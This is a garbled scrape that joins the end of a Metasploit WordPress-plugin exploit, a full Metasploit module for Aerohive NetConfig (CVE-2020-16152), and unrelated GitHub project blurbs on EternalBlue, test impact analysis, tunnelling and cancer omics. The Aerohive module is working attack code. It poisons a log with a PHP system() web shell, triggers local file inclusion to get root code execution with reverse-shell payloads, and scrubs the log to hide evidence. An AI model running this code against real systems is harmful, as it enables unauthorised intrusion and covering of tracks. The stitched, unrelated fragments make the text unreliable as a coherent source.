vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login\.php5\?version=(.*?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "<?php system($_POST['#{@shell_cmd_name}']);?>" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c \"#{cmds_to_clean_log}\"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend
AnamolZ / ExploitationThe Metasploit Exploitation - EternalBlue SMB Exploit module within the Metasploit framework enables security professionals and researchers to test the vulnerability and assess its impact on target systems. This module can also be used to develop custom payloads and exploit techniques for further research and analysis.
ChengChen-Steven / Real Time Excavation Positioning Of Roadheader Based On Visual MeasurementVisual measurement is a construction positioning method developed in recent years. Combining visual measurements with on-site Guiyang subway construction, this paper proposes an automatic positioning method of roadheader excavation, replacing human vision by machine vision, and changing the current situation in tunnel excavation. First, a laser beam emits from a distance to the tunnel face. Pictures taken by a camera set on the body of roadheader are analyzed digitally based on RGB system by building a computer model by using MATLAB. The model extracts spots’ centers. Then, based on mathematical analysis of digital image, model gives the decoupled eigenvalues of positional relationship between the actual position and the standard position of roadheader in three principal directions, so as to effectively guide the construction and implement automation. This paper also makes experiments to compare characteristics of single laser spot by RGB decomposition, test model’s accuracy in extracting image of laser beam, and use a similar model to analyze the impact of camera distortion in the actual work.
jqassistant-archive / Jqassistant Test Impact Analysis PluginjQAssistant plugin for analyzing impact on tests based on changes in Git repositories.
systemgroupnet / SG.CodeCoverage🧪 A code coverage library, used for Test Impact Analysis (or Continuous Testing) in our internal testing framework.
thanhminhmr / JavaCIAJava Change Impact Analysis, a library that parse 2 consecutive versions of a Java project and produce some advices about where (not) to do regression testing on your program.
SunnyDayDev / Test Impact PluginPlugin for running tests based on impact analysis of changes
Edgar-Mendonca / Split Hopkinson Pressure Bar Analysis ToolSHPB PROCESSING / Split Hopkinson Pressure Bar Analysis Tool application is used for data interpretation of the signals obtained from experiments conducted on a Split Hopkinson Pressure Bar setup for high-velocity impact tests.
Samudraneel-98 / Cancer Subtype Prediction Using Multi Omics DatasetImportance of Cancer Subtype prediction: Cancer is a heterogeneous disease caused by chemical, physical, or genetic factors. Identification of cancer subtypes is of great importance to facilitate cancer diagnosis and therapy. Bioinformatics approaches have gradually taken the place of clinical observations and pathological experiments. The development of high-throughput genome analysis techniques on the research of cancer subtypes plays an important role in the analysis and clinical treatment of various kinds of cancers. Omics dataset: The process of mapping and sequencing the human genome began, new technologies have made it possible to obtain a huge number of molecular measurements within a tissue or cell. These technologies can be applied to a biological system of interest to obtain a snapshot of the underlying biology at a resolution that has never before been possible. Broadly speaking, the scientific fields associated with measuring such biological molecules in a high-throughput way are called omics.Omics are novel, comprehensive approaches for analysis of complete genetic or molecular profiles of humans and other organisms. the types of omics data that can be used to develop an omics-based test are discussed below: genomics, proteomics, transcriptomics and metabolomics. Importance of Omics Data with respect to Cancer Prediction: Accurately predicting cancer prognosis is necessary to choose precise strategies of treatment for patients. One of effective approaches in the prediction is the integration of multi-omics data, which reduces the impact of noise within single omics data. A number of methods have been proposed to integrate multi-sources data to identify cancer subtypes in recent years.Based on these types of expression data, various computational methods have been proposed to predict cancer subtypes. It is crucial to study how to better integrate these multiple profiles of data. Approaches of omics data concatenation: 1.Integrative NMF 2.Similarity Network Fusion 3.Joint Non Negative Matrix Factorization Deep Learning: Deep learning is an artificial intelligence (AI) function that imitates the workings of the human brain in processing data and creating patterns for use in decision making. Deep learning is a subset of machine learning in artificial intelligence that has networks capable of learning unsupervised from data that is unstructured or unlabeled. Hyperparameter tuning: Hyperparameter tuning works by running multiple trials in a single training job. Each trial is a complete execution of your training application with values for your chosen hyperparameters, set within limits you specify. The AI Platform Training training service keeps track of the results of each trial and makes adjustments for subsequent trials. When the job is finished,you can get a summary of all the trials along with the most effective configuration of values according to the criteria you specify.
SoniSiddharth / Impact AnalysisImpact analysis of software change leveraging ML, NLP models from huge number of test cases and requirement documents written in English – Using Universal Sentence Encoder (USE) model